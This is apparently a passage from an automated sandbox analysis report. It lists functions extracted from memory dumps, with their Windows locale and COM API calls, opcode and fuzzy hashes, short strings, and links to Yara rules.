Function 6E9E5DE7, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 6E9DA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E9CED16,6E9FD0A0,0000000C,00000004,00000001,00000004,?,6E9B4865,00000000,00000000), ref: 6E9DA298
Part of subcall function 6E9DA294: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E9B4865,00000000,00000000), ref: 6E9DA33C
Part of subcall function 6E9DA294: _abort.LIBCMT ref: 6E9DA342

Part of subcall function 6E9DA294: _free.LIBCMT ref: 6E9DA2EF

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E9E5E3B

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: 812503862fc740cc3e391515fb374f5ac0070ddc3df1d7174cacdd2df31a584a
Instruction ID: 65106e01b816794fecc05a5bad6b45c25a04cafe6438eb5fd0943db026774bfb
Opcode Fuzzy Hash: 812503862fc740cc3e391515fb374f5ac0070ddc3df1d7174cacdd2df31a584a
Instruction Fuzzy Hash: A5213172914216BBEB169EA6CC41BAA73BCEF41314F0040BEEE05DA540EB75ED44CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E5A6F, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 6E9DA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E9CED16,6E9FD0A0,0000000C,00000004,00000001,00000004,?,6E9B4865,00000000,00000000), ref: 6E9DA298
Part of subcall function 6E9DA294: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E9B4865,00000000,00000000), ref: 6E9DA33C
Part of subcall function 6E9DA294: _abort.LIBCMT ref: 6E9DA342

EnumSystemLocalesW.KERNEL32(6E9E5B97,00000001,00000000,?,6E9DB71F,?,6E9E61C4,00000000,?,?,?), ref: 6E9E5AE1

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort
String ID:
API String ID: 2626063627-0
Opcode ID: 4081ed015d49979ad5f2c2c6387baaf6570d9f6b06e3b5cce270ba295c476ed7
Instruction ID: e666da35b36e84d363bd0a9e8ee8eb1c276dcdd6538c70b2e35224e0a7836909
Opcode Fuzzy Hash: 4081ed015d49979ad5f2c2c6387baaf6570d9f6b06e3b5cce270ba295c476ed7
Instruction Fuzzy Hash: E611253A2047019FDB189FB9C8D06BABBA5FF80318B18482CDA8687E40E771F502CF40

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C3C90, Relevance: 1.6, APIs: 1, Instructions: 56comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(6E9EB3B0,00000000,00000001,6E9F9518,?,B5334A76,?,?,?,?,Function_00039E40,000000FF), ref: 6E9C3CEC

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: b4eb1087bbd7cf55806b227476d59ded9f67c5d3c0c9624f032b13cf0926e13e
Instruction ID: 94a420519954c3a6becb9237d099be3959f3b2741b5e697c2b31d345a4c613fd
Opcode Fuzzy Hash: b4eb1087bbd7cf55806b227476d59ded9f67c5d3c0c9624f032b13cf0926e13e
Instruction Fuzzy Hash: 1711A1B2648615ABC321CF89D880F5AF7B8FF89B21F10427AFE059B740DB319C00CA95

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E6017, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 6E9DA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E9CED16,6E9FD0A0,0000000C,00000004,00000001,00000004,?,6E9B4865,00000000,00000000), ref: 6E9DA298
Part of subcall function 6E9DA294: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E9B4865,00000000,00000000), ref: 6E9DA33C
Part of subcall function 6E9DA294: _abort.LIBCMT ref: 6E9DA342

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,6E9E5DB5,00000000,00000000,?), ref: 6E9E6043

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$InfoLocale_abort
String ID:
API String ID: 2070445861-0
Opcode ID: 9151e74e20cc0c85aada8297dc5d95838754e60de0496e064370d99482058091
Instruction ID: bc4424e43c9989c17570552f1700936bcdbcbb4fe55428062a0a0b46b38c49eb
Opcode Fuzzy Hash: 9151e74e20cc0c85aada8297dc5d95838754e60de0496e064370d99482058091
Instruction Fuzzy Hash: 17F04932920126EFDB259AE68809BBA377CEF40715F004868DF15A3940EA74FD51CAD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E597B, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 6E9DA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E9CED16,6E9FD0A0,0000000C,00000004,00000001,00000004,?,6E9B4865,00000000,00000000), ref: 6E9DA298
Part of subcall function 6E9DA294: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E9B4865,00000000,00000000), ref: 6E9DA33C
Part of subcall function 6E9DA294: _abort.LIBCMT ref: 6E9DA342

Part of subcall function 6E9DA294: _free.LIBCMT ref: 6E9DA2EF

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,6E9DB726,00000000,6E9DB846), ref: 6E9E59CF

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: b1749b9a7d83851ca815a67d397a92d47ed90b0568f435dbf42c766caa781a2c
Instruction ID: 14ebb71d8eb9ea625556f2ccb3f9033b29d7708b2a3c9c6dcd038f70c8e9dae8
Opcode Fuzzy Hash: b1749b9a7d83851ca815a67d397a92d47ed90b0568f435dbf42c766caa781a2c
Instruction Fuzzy Hash: 78F0F432A51205ABCB159EB5DC44AFA33ACDF85724F1045BAEA06D7240EA78ED05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E5B0A, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 6E9DA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E9CED16,6E9FD0A0,0000000C,00000004,00000001,00000004,?,6E9B4865,00000000,00000000), ref: 6E9DA298
Part of subcall function 6E9DA294: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E9B4865,00000000,00000000), ref: 6E9DA33C
Part of subcall function 6E9DA294: _abort.LIBCMT ref: 6E9DA342

EnumSystemLocalesW.KERNEL32(6E9E5DE7,00000001,FFFFFFFF,?,6E9DB71F,?,6E9E6188,6E9DB71F,?,?,?,?,?,6E9DB71F,?,?), ref: 6E9E5B56

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort
String ID:
API String ID: 2626063627-0
Opcode ID: 9707f3ecde8964abe8cec0c28e6828016e5d6f8999c52ccb171f2756443c5854
Instruction ID: 6c39c94679ec8165aafa01936a5770dea8ead3fc58dd676a5e377d336ea5600d
Opcode Fuzzy Hash: 9707f3ecde8964abe8cec0c28e6828016e5d6f8999c52ccb171f2756443c5854
Instruction Fuzzy Hash: 4CF0F6363047055FD7165FBADC80A6A7BA9FF8076CF09842CEB458BA40E7B1E842CE50

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DDD93, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 6E9D7625: EnterCriticalSection.KERNEL32(-6EA00F0D,?,6E9DE708,?,6E9FD460,0000000C), ref: 6E9D7634

EnumSystemLocalesW.KERNEL32(6E9DDD86,00000001,6E9FD420,0000000C), ref: 6E9DDDCB

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: c5b4ddf440e2f3ce1879281af84062556014a56f5792a8e2ea7c2c71356e8380
Instruction ID: 6b957b901cfc14624b9349e6bd708fa76f00c629c53545d689daebde9213f1ef
Opcode Fuzzy Hash: c5b4ddf440e2f3ce1879281af84062556014a56f5792a8e2ea7c2c71356e8380
Instruction Fuzzy Hash: B1F08772A10B049FDB10DFA8C805BA93BF4BF96328F008519F504DB2D0EB308949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DE2F8, Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,?,?,?,6E9DB7B9,?,20001004,?,00000002,?), ref: 6E9DE337

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 7a0d0ba07007946f184787c08fb3065e132f75fe52a4a282e09212151d9f6375
Instruction ID: 2b67d7e3ba8e294c6165fee69dfd68e41ddfb4c2c015c676c8aee546a4d9dc32
Opcode Fuzzy Hash: 7a0d0ba07007946f184787c08fb3065e132f75fe52a4a282e09212151d9f6375
Instruction Fuzzy Hash: EFF0E231A00A28BBCF02AFA0CC00DBEBB69EF59710F008514FC0166310CB32DE259E95

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E5A24, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 6E9DA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E9CED16,6E9FD0A0,0000000C,00000004,00000001,00000004,?,6E9B4865,00000000,00000000), ref: 6E9DA298
Part of subcall function 6E9DA294: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E9B4865,00000000,00000000), ref: 6E9DA33C
Part of subcall function 6E9DA294: _abort.LIBCMT ref: 6E9DA342

EnumSystemLocalesW.KERNEL32(6E9E597B,00000001,FFFFFFFF,?,?,6E9E61E6,6E9DB71F,?,?,?,?,?,6E9DB71F,?,?,?), ref: 6E9E5A5B

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort
String ID:
API String ID: 2626063627-0
Opcode ID: c8ebac62db4f785c7a55426398f5a744b99bc116e9a8ef5bb00574eb6033b42d
Instruction ID: 37e90468d46aec9f33efb714dc8c6b2c940174e8ff7d350dc49ca7062e8c8353
Opcode Fuzzy Hash: c8ebac62db4f785c7a55426398f5a744b99bc116e9a8ef5bb00574eb6033b42d
Instruction Fuzzy Hash: C8F0AB3630020967CB059FB6C8847AA7FA8FFC2724F0A4058EB068B650E272D943CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01046B25, Relevance: 1.5, Strings: 1, Instructions: 245COMMON

Download Yara Rule

Strings

%, xrefs: 01046CA5

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: %
API String ID: 0-3264965323
Opcode ID: cb2a0e167fe82fa2ec9ed03ed4b68d84e7db1218caa4b1bb78857a5f4fe75894
Instruction ID: 934006cdbd0c27c3b4dc854afb18cc5032ed839e423b0a83d6a4b4fad4e7bbe4
Opcode Fuzzy Hash: cb2a0e167fe82fa2ec9ed03ed4b68d84e7db1218caa4b1bb78857a5f4fe75894
Instruction Fuzzy Hash: 87B169B15083419FC7A8DA25C49956FBBF0FB96708F404D2DF6D686260E7728989CF43

Uniqueness

Uniqueness Score: -1.00%

Function 01059DA1, Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

Ci,, xrefs: 01059DCA

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: Ci,
API String ID: 0-192566918
Opcode ID: 5f915c74aebb82ae42e9263993067c442fc4f0db6a7726f02f37a687e14f641f
Instruction ID: 1f4721b48ce7ba33674cf2b985ee22f775132292ba73aa61633c9364fd61fa41
Opcode Fuzzy Hash: 5f915c74aebb82ae42e9263993067c442fc4f0db6a7726f02f37a687e14f641f
Instruction Fuzzy Hash: D2B11071208341DFD7A8CF25C58951BBBE2FBC9758F008A1DF6C696260D7B299098F46

Uniqueness

Uniqueness Score: -1.00%

Function 6E9CDA2D, Relevance: 1.5, Strings: 1, Instructions: 215COMMON

Download Yara Rule

Strings

0, xrefs: 6E9CDB9D

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 41a65894c1243ec84d441c124d89baabc1dcae01a738f4c9180a4174ac12db86
Instruction ID: 3edfb502c227b0358e3a8b08d5f3a40bf710840127858b23cc19e07d33cbe391
Opcode Fuzzy Hash: 41a65894c1243ec84d441c124d89baabc1dcae01a738f4c9180a4174ac12db86
Instruction Fuzzy Hash: 3A5164612C86466BDB90B9E888B17FF37AC9F42F44F001D0ADA92CB782D605D642CE57

Uniqueness

Uniqueness Score: -1.00%

Function 01042A46, Relevance: 1.5, Strings: 1, Instructions: 213COMMON

Download Yara Rule

Strings

8r=, xrefs: 01042C29

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: 8r=
API String ID: 0-2421701215
Opcode ID: 295a20afd4629238722f487bbf07bdc2b52ccb34710e1f192d5c8ccdbf7de296
Instruction ID: 761de361adc124deac797281c96606480859f7c405e48ab79e229d4ce9cbceca
Opcode Fuzzy Hash: 295a20afd4629238722f487bbf07bdc2b52ccb34710e1f192d5c8ccdbf7de296
Instruction Fuzzy Hash: E5A120B21083819FC358DF65D88984BFBF1FBC4358F005A2EF1D59A260D7B5CA498B82

Uniqueness

Uniqueness Score: -1.00%

Function 01041C76, Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

p#[, xrefs: 01041E12

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: p#[
API String ID: 0-3919597151
Opcode ID: 95bd53a8cd285bb78030567b64ba3a81a7881134e7ff1adfe1c1a355e542d212
Instruction ID: 34d0c9ba1b8a8ae6f60e493be751366387023f3cc393cc4be53db30a6727de00
Opcode Fuzzy Hash: 95bd53a8cd285bb78030567b64ba3a81a7881134e7ff1adfe1c1a355e542d212
Instruction Fuzzy Hash: 565175B11093019FC7A8CE26C58982BBBE5FBC4748F40491DF5CA92260D7B1DA49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 0105406E, Relevance: 1.4, Strings: 1, Instructions: 136COMMON

Download Yara Rule

Strings

[B, xrefs: 01054292

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: [B
API String ID: 0-3436147626
Opcode ID: a3ae6741022e1685c9b67d45ebb240180f37c3f176d35d3c19d9f155d4cd3eb7
Instruction ID: b7083666b04b5a0a565d6f6ca074b2bcf07785183c4ab89e5ce5a2c3fb696288
Opcode Fuzzy Hash: a3ae6741022e1685c9b67d45ebb240180f37c3f176d35d3c19d9f155d4cd3eb7
Instruction Fuzzy Hash: A25154724083429FC794CF25C84995BBBE1FBD8758F408A1CF5CAA6160E3B5CA49CF86

Uniqueness

Uniqueness Score: -1.00%

Function 010578A5, Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

ID, xrefs: 010578EF

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: ID
API String ID: 0-299066170
Opcode ID: 5b88523c4a8a29f1f8463c3ad97ac3549addcaf8d0952cc7dd13773f02622f43
Instruction ID: ac14f3c5b8307724d3917ecafbfd92a3965858ed44f41f1e78482fdaa62081e8
Opcode Fuzzy Hash: 5b88523c4a8a29f1f8463c3ad97ac3549addcaf8d0952cc7dd13773f02622f43
Instruction Fuzzy Hash: 7041003110C3428BC798CE24E54446FBBF1EBD4758F50492EF9DA66260D3748A49DBA3

Uniqueness

Uniqueness Score: -1.00%

Function 01060687, Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

Jd}, xrefs: 0106069B

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: Jd}
API String ID: 0-2909368870
Opcode ID: 375f760bc60cdf05572d8ee9cb941027e2c69033bf71ca4e0f4402854d73eeed
Instruction ID: 7f2bb67233b0d9541395d78477d3ddfb91db2f0e4211045a3f80477bbb9f8d2e
Opcode Fuzzy Hash: 375f760bc60cdf05572d8ee9cb941027e2c69033bf71ca4e0f4402854d73eeed
Instruction Fuzzy Hash: 2B418771A483428BC758DF29C84561FBBE5FBC4348F544A2CF8D696225D378EA08CF96

Uniqueness

Uniqueness Score: -1.00%

Function 01043F5C, Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

[ , xrefs: 01043FC0

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: [
API String ID: 0-603502248
Opcode ID: 27cbefbce515dd8bc70399823a0d799d1188f19287186614176daeb31b516365
Instruction ID: fc5b2a526d1929ac022fc3764de7e36549c59cfa0c43ba36d7a962a07efb6723
Opcode Fuzzy Hash: 27cbefbce515dd8bc70399823a0d799d1188f19287186614176daeb31b516365
Instruction Fuzzy Hash: 244177B2A093119FC354CF69C88456BFBE0FF88718F414A2EF98997250D774D908CB96

Uniqueness

Uniqueness Score: -1.00%

Function 010608D1, Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

S,, xrefs: 010609A3

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: S,
API String ID: 0-1214237515
Opcode ID: 9cb05a660b66e1873e24085b72932825c80e311a7f5372bc87ad04fac45b25ed
Instruction ID: 4738f26c688d51b8a7ac46d25c98b147de6bef4869283c73a22684043b81c211
Opcode Fuzzy Hash: 9cb05a660b66e1873e24085b72932825c80e311a7f5372bc87ad04fac45b25ed
Instruction Fuzzy Hash: 7C41F172D0021DEBCF08DFA6D94A4EEBFB1FB48314F2480A9D511B6260C7B51A45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 01061193, Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

Zc, xrefs: 010611BD

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: Zc
API String ID: 0-1893601696
Opcode ID: 460722643652c2d26e6f0acc2054c1627bebfdbfebb164a59c5f1e01b163e435
Instruction ID: 919022129accdf58d5d4dd6a854b3ecb0dc6268ebd724a91e6aeb0f8aba83a4f
Opcode Fuzzy Hash: 460722643652c2d26e6f0acc2054c1627bebfdbfebb164a59c5f1e01b163e435
Instruction Fuzzy Hash: F031F2B15083428F9758CE69994A41FBBE8FBC8748F004E1EE5D6A6210D3B4DA1DCF97

Uniqueness

Uniqueness Score: -1.00%

Function 01054D8D, Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

^@, xrefs: 01054DFF

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: ^@
API String ID: 0-322773941
Opcode ID: 262d6f7a42c3e2db43ddbccf0926ae04e26865167014d134ba7cda9bf7d65114
Instruction ID: 66bf6e82de0be77e86baef64f3bae8bc7febe8f064d352d558a24fb7fff44145
Opcode Fuzzy Hash: 262d6f7a42c3e2db43ddbccf0926ae04e26865167014d134ba7cda9bf7d65114
Instruction Fuzzy Hash: 1C31F2B2D00209BBCF15CFA5C84A8DEBBB5FB99704F108189F924A6210D3B59A65DF90

Uniqueness

Uniqueness Score: -1.00%

Function 0105BEC9, Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

~O_, xrefs: 0105BF6D

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: ~O_
API String ID: 0-756777959
Opcode ID: db3090a45ae7c3739e898a1f80ef998c91600e0c0b12169495f342901a5e0f42
Instruction ID: 6fd335f9094639c533fe6f14bc12a8319cbd88a475ea04a5bedcd5bc85b09f05
Opcode Fuzzy Hash: db3090a45ae7c3739e898a1f80ef998c91600e0c0b12169495f342901a5e0f42
Instruction Fuzzy Hash: 64313372E00209EBCF58DFA9C98A5EEBBF2FB44314F208099D555B7220C3B56A54CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01042309, Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

SV, xrefs: 0104233B

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: SV
API String ID: 0-4155469514
Opcode ID: aa54f9b76efbf05d33aa619649d369acef8757e109c6e7a342c2e7e00eb461e9
Instruction ID: b19ac0f13099703b6e36f819039ae451005ec0e5be23bbf22461e63d0bfcbd3c
Opcode Fuzzy Hash: aa54f9b76efbf05d33aa619649d369acef8757e109c6e7a342c2e7e00eb461e9
Instruction Fuzzy Hash: 383111B0D0021AEBCF54CFE5D94A4EEBBB0FB00300F10819AE521A7260D7B69A52CF81

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E1929, Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf52a463fe2accb32c268f62977e4e6cdc84a3c9ed722360257517db28a5c2bd
Instruction ID: 74cac3f6a66538503f8723afa34baa361d4c4ba56b68a99297cdfa9165c4b84c
Opcode Fuzzy Hash: bf52a463fe2accb32c268f62977e4e6cdc84a3c9ed722360257517db28a5c2bd
Instruction Fuzzy Hash: BF324362D69F024DDB239536C822335A25CAFB73C5F15D727E82AB5E9AEB39C0C34540

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B2A80, Relevance: .4, Instructions: 425COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _strcspn
String ID:
API String ID: 3709121408-0
Opcode ID: 253641d6eddec683114bd2c740f6ec2e2ef711534c9f06acdf643e35b9b5cae3
Instruction ID: edc50c6f84434e0d58097869562daecaed90a36cdbf5efc05a477abe1e2dd8ba
Opcode Fuzzy Hash: 253641d6eddec683114bd2c740f6ec2e2ef711534c9f06acdf643e35b9b5cae3
Instruction Fuzzy Hash: 73E19D72E10219ABDB09DFA8DC40AEFBBB9EF99704F14452AF815A7240D734E901CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E9CAB80, Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: b9f7dafe7840ed940cd9e304d21f7f9f85833c00e90fa5307ba9b9e2dc4d04cc
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: C69195722490A30EE79956BE847407EFFF55E427A130A079DD4F3CA1C5EE50C1649E23

Uniqueness

Uniqueness Score: -1.00%

Function 6E9CAE3B, Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
